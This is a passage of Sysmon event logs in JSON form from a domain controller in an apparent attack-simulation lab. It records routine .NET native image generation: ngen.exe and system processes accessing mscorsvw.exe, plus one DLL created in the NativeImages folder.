3dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7105,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.898\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-00109E000C00}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.898","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-00109E000C00}","TargetProcessId":"2508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7106,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.898\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-00109E000C00}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.898","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-00109E000C00}","TargetProcessId":"2508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7107,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-00109E000C00}\r\nTargetProcessId: 2508\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-00109E000C00}","TargetProcessId":"2508","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7108,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.960\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010F3030C00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.960","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010F3030C00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7109,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.960\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010F3030C00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.960","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010F3030C00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7110,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:20.960\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2240-5F25-0000-0010F3030C00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:20.960","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2240-5F25-0000-0010F3030C00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7111,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:21.929\r\nProcessGuid: {41C8662E-2240-5F25-0000-0010F3030C00}\r\nProcessId: 4632\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1218-0\\Microsoft.Internal.Tasks.Dataflow.dll\r\nCreationUtcTime: 2020-08-01 08:05:21.913","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:21.929","ProcessGuid":"{41C8662E-2240-5F25-0000-0010F3030C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1218-0\\Microsoft.Internal.Tasks.Dataflow.dll","CreationUtcTime":"2020-08-01 08:05:21.913","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7112,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:21.976\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2241-5F25-0000-0010F3070C00}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:21.976","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2241-5F25-0000-0010F3070C00}","TargetProcessId":"3776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
